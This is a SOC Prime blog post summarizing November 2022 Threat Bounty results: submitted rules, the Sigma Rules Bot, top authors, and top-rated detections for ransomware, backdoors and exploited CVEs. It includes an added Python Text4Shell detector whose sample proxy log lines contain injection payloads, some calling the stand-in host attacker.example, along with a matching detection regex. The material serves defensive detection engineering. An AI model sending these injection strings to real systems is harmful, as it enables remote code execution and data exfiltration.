SOC Prime Threat Bounty — November 2022 Results

Threat Bounty Program November

November ‘22 Publications

During the previous month, members of the Threat Bounty community submitted 433 rules for publication to the SOC Prime Platform. A number of rules were automatically rejected at the automated-check stage because of structure, syntax, or logic mistakes, or because they duplicated existing content, and were not sent for review by SOC Prime experts. In November, 123 detections passed SOC Prime review and were published to the Platform for monetization.


To learn more about the common reasons for publication rejection and the main acceptance criteria, please see SOC Prime Threat Bounty — October 2022 Results.

To ensure that your content qualifies for publication to the Platform via the Threat Bounty Program, we recommend that you first research the existing content on the SOC Prime Platform using the Lucene query search, and pay attention to rule naming, descriptions, references to resources, and relevant MITRE ATT&CK® tags. Please note that Sigma rules that are based entirely on alerts from other security solutions are not accepted for publication via the Threat Bounty Program. Also, while creating a rule, it is essential that authors apply the changes and improvements suggested by the automated check.

Sigma Rules Bot for Threat Bounty

The Sigma Rules Bot, already actively used by advanced Threat Bounty content developers, is officially released to the Slack App Directory. With the Sigma Rules Bot, members of the Threat Bounty community can create rules directly in Slack, test them for common issues, including syntax mistakes and the uniqueness of the detection logic, and send the rules for review by SOC Prime. During the SOC Prime review, which is a mandatory step for publishing rules to the Platform for monetization, SOC Prime experts can now reach out to the content author via the Slack bot by opening a chat linked to the specific submitted Sigma rule.

The Sigma Rules Bot provides an easy and seamless way to improve and monetize detection engineering skills by publishing unique threat detection Sigma rules to the SOC Prime Platform. See the step-by-step guide for more details.

Top Authors

The Threat Bounty detections published by these authors received the highest ratings on the Threat Detection Marketplace:

Nattatorn Chuensangarun

Osman Demir

Sittikorn Sangrattanapitak

Kyaw Pyiyt Htet

Emir Erdogan

The average Threat Bounty reward payout for November is $1,647.

Top-Rated Content

Suspicious FIN7’s Black Basta Ransomware Operation By Detection of Associated Events (via registry_key) threat hunting Sigma rule by Kyaw Pyiyt Htet (Mik0yan) detects the registry Run keys used for persistence in FIN7’s Black Basta ransomware operation.

Possible Initial Access by Text4Shell Template Injection [CVE-2022-42889] (via proxy) threat hunting Sigma rule by Kyaw Pyiyt Htet (Mik0yan) detects keywords in the URI field of HTTP requests that are known to be used in exploitation of the Text4Shell vulnerability. See the article for more information.
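To illustrate the kind of URI keyword check such a proxy-based rule performs, here is an added example in Python. It is not the published Sigma rule and not SOC Prime's code; the proxy log format, the IP addresses, and the request lines are constructed for the example. It looks for the `${script:`, `${dns:` and `${url:` interpolator prefixes of Apache Commons Text that CVE-2022-42889 exposes, and percent-decodes the URI first so that encoded and double-encoded payloads are not missed, which a naive literal match on the raw URI would do.

```python
"""Added example, not SOC Prime's rule: Text4Shell (CVE-2022-42889)
keyword check over the URI field of constructed proxy log lines."""
import re
from urllib.parse import unquote

# Interpolator prefixes reachable through the vulnerable StringSubstitutor.
TEXT4SHELL_PREFIXES = ("script", "dns", "url")

# Matches "${script:", "${dns:" or "${url:" (whitespace tolerated) after decoding.
_PATTERN = re.compile(
    r"\$\{\s*(" + "|".join(TEXT4SHELL_PREFIXES) + r")\s*:", re.IGNORECASE
)

# Constructed proxy log lines: "<timestamp> <src_ip> <method> <uri> <status>".
SAMPLE_PROXY_LOG = [
    "2022-11-03T10:15:01Z 203.0.113.7 GET /search?q=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27id%27%29%7D 200",
    "2022-11-03T10:15:05Z 203.0.113.7 GET /search?q=${dns:address|attacker.example} 200",
    "2022-11-03T10:16:11Z 198.51.100.2 GET /index.html 200",
    # The bare word "url" in a parameter name is benign and must not match.
    "2022-11-03T10:17:42Z 198.51.100.9 GET /api/v1/items?url=https://example.org 200",
    # Double-encoded payload: %2524 -> %24 -> $ only after two decode passes.
    "2022-11-03T10:18:03Z 203.0.113.7 POST /login?next=%2524%257Burl%253Ahttp%253A%252F%252Fattacker.example%257D 302",
]


def decode_uri(uri: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so multi-encoded payloads surface."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def matched_prefix(uri: str):
    """Return the Text4Shell interpolator prefix found in the URI, or None."""
    match = _PATTERN.search(decode_uri(uri))
    return match.group(1).lower() if match else None


def is_text4shell_uri(uri: str) -> bool:
    return matched_prefix(uri) is not None


def scan_proxy_log(lines):
    """Return (src_ip, prefix, decoded_uri) for each line whose URI matches."""
    hits = []
    for line in lines:
        fields = line.split(maxsplit=4)
        if len(fields) < 5:
            continue  # malformed line, skip rather than crash the scan
        _ts, src_ip, _method, uri, _status = fields
        prefix = matched_prefix(uri)
        if prefix:
            hits.append((src_ip, prefix, decode_uri(uri)))
    return hits


if __name__ == "__main__":
    for src_ip, prefix, uri in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"Text4Shell attempt from {src_ip}: ${{{prefix}:...}} in {uri}")
```

In a real Sigma rule the same idea is expressed as a `contains` list over the URI field; the decoding step is the part that is easy to forget, since proxies often log the URI exactly as the client sent it, and attackers encode the `${` sequence precisely to slip past literal matches.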

Possible Black-Basta Attack [QakBot] (November 2022) Lateral Movement Activity By Detection of Associated Process (via process_creation) threat hunting Sigma rule by Zaw Min Htun (ZETA) detects execution of a Cobalt Strike payload via rundll32.exe with the SetVolume export, as used by Black Basta. The threat actor leverages Qakbot, and a potentially widespread campaign is being run by Black Basta operators.

Possible Toneshell Backdoor Persistence by Detection of Associated Scheduled Task (via process_creation) threat hunting Sigma rule by Aytek Aytemur detects suspicious scheduled task creation used to establish persistence for the Toneshell backdoor, which is associated with the Earth Preta APT group.

Possible Qbot Malware Collection Data by Using OpenWith Process with Follina Exploit [CVE-2022-30190] (via process_creation) threat hunting Sigma rule by Nattatorn Chuensangarun detects suspicious Qbot malware activity that uses the OpenWith process to collect data via the Follina exploit (CVE-2022-30190).

Code the way to your proven cybersecurity expertise with SOC Prime Threat Bounty Program and earn cash with your own detection rules published to the Detection as Code Platform.